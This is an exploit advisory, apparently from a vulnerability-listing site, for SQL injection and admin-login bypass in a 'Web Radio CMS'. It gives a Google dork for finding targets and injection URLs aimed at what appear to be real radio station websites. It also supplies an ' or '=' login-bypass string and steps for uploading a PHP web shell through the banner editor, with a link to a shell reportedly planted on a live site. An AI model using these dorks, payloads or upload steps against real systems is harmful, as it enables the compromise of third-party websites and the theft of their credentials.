Web Radio CMS Sql injection

2015.03.12

Credit: Ashiyane Digital Security Team

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: site:br inurl:base.php?pagina=

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Exploit Title: Web Radio Sql injection
[+]
[+] Exploit Author: Ashiyane Digital Security Team
[+]
[+] Date: 2015-03-12
[+]
[+] Google Dork : site:br inurl:base.php?pagina=
[+]
[+] Tested on: Kali Linux , Iceweasel
[+]
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Location : localhost]/patch/base.php?pagina=noticia&id=[Sql Injection]
[+]
[+] Location 2 : [localhost]/patch/admin/login.php
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Demo 1 :
[+]
[+] http://radiomoaXrandu.com.br/radio/base.php?pagina=noticia&id=-108%27+union+select+1,2,@@version,4,5,6,7--+
[+]
[+] http://conexaoXnova.com.br/~usina/base.php?pagina=noticia&id=-109%27+union+select+1,@@version,3,4,5,6,7--+
[+]
[+] http://www.cXlubefm.net/base.php?pagina=noticia&id=108%27
[+]
[+] http://cidXadefmarapoti.com/base.php?pagina=noticia&id=158%27
[+]
[+] http://pXarecis90.com.br/base.php?pagina=noticia&id=186%27
[+]
[+] http://www.radioeXxtremozfm.com.br/base.php?pagina=noticia&id=121%27
[+]
[+] http://www.radioXd10fm.com/base.php?pagina=noticia&id=117%27
[+]
[+] http://www.radXioacer98fm.com.br/base.php?pagina=noticia&id=109%27
[+]
[+]
[+]
[+[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] User , Password '=' 'or'
[+]
[+][+[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Demo 2 :
[+]
[+] http://www.radioXfantasticafestas.com/admin/login.php
[+] http://www.cidaXdedirceufm.com/admin/login.php
[+] http://www.cluXbefm.net/admin/login.php
[+] http://www.raXdioacer98fm.com.br
[+] http://cidadeXfmarapoti.com/admin/login.php
[+] http://cultuXrafmprimavera.com.br/admin/login.php
[+] http://reXnascerfm.net/admin/login.php
[+] http://parXecis90.com.br/admin/login.php
[+] http://www.radiod10Xfm.com/admin/login.php
[+] http://radiomoaranXdu.com.br/radio/admin/login.php
[+] http://www.radiorXenovada.com/admin/login.php
[+] http://www.radioXextremozfm.com.br/admin/login.php
[+] http://www.radXiorainhafm.net.br/admin/login.php
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Vulnerable Code : login.php
[+]
<?php
include("includes/config.php");
if (isset($_POST['login'])){
$login = $_POST['login'];
//Verifica se existe usuario
$sql_busca = "SELECT * FROM user WHERE login = '$login'";
$exe_busca = mysql_query($sql_busca) or die (mysql_error());
$fet_busca = mysql_fetch_assoc($exe_busca);
$num_busca = mysql_num_rows($exe_busca);
//verifica se existe uma linha com o login digitado
if ($num_busca > 0){
$email = $fet_busca['email'];
$senha = $fet_busca['senha'];
$topico = "Esquece senha";
$mensagem = "<html>";
$mensagem .= "<body>";
$mensagem .= "<br>Voc&#234; efetuou um pedido de recupera?o de senha no $nome_site.</br>";
$mensagem .= "<br>Login: $login";
$mensagem .= "<br>Senha: $senha</br>";
$mensagem .= "<br><br>Site oficial do $nome_site";
$mensagem .= "<br><a href='$site'>$site</a></br>";
$mensagem .= "</body>";
$mensagem .= "</html>";
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
$headers .= "From: $nome_site <$email>\r\n";
//enviar para o email o login e a senha
mail($email, $topico, $mensagem, $headers);
echo '<script type="text/javascript">alert("Sua senha foi enviado para seu e-mail.")</script><script>window.location="login.php";</script>';
}
else {
echo '<script type="text/javascript">alert("Esse login n?o existe.")</script><script>window.location="login.php";</script>';
}
}
?>
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
Upload Your Shell To Script
Login Page Admin
Go To Addresss : localhost]/patch/admin/index.php?sessao=admin_banner
Click To Alterar
Use Live Http Headers For Rename Shell JPG To PHP
Ok ;)
Sheller Address : localhost]/patch/images/banners/file.php
Demo Upload Sheller = http://www.casadaprXofecia.com.br/images/banners/8fdc8ec53b.php
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Discovered By : Milad Hacking
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Web Radio CMS Sql injection

Dork: site:br inurl:base.php?pagina=

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.